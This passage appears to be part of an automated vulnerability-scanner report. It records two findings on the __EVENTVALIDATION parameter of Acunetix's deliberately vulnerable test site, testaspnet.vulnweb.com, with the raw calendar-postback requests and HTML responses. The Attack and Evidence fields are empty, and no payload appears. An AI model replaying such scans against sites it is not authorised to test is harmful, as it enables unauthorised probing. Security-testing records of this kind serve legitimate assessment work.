bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8525&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAc6v7TNsIZGRkD1MoNHGEYWflCkB1fLyhHihk%2Bpw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKpwMnuCgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxviKIbh1RhS3pC%2BkSTsw5yibV7%2B
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:56 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAc6v7TNsIZGRkD1MoNHGEYWflCkB1fLyhHihk+pw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpwMnuCgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxviKIbh1RhS3pC+kSTsw5yibV7+" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:White" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8231&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAAPb0ZdoIZGRkZH%2FGNfuVmoV1RDSDwCo7AplxXf8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQ4PaYCgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9s%2FbVRT%2F%2Bt0x22Rymq0keTzkeOWA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:36 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAAPb0ZdoIZGRkZH/GNfuVmoV1RDSDwCo7AplxXf8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQ4PaYCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9s/bVRT/+t0x22Rymq0keTzkeOWA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:White" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this 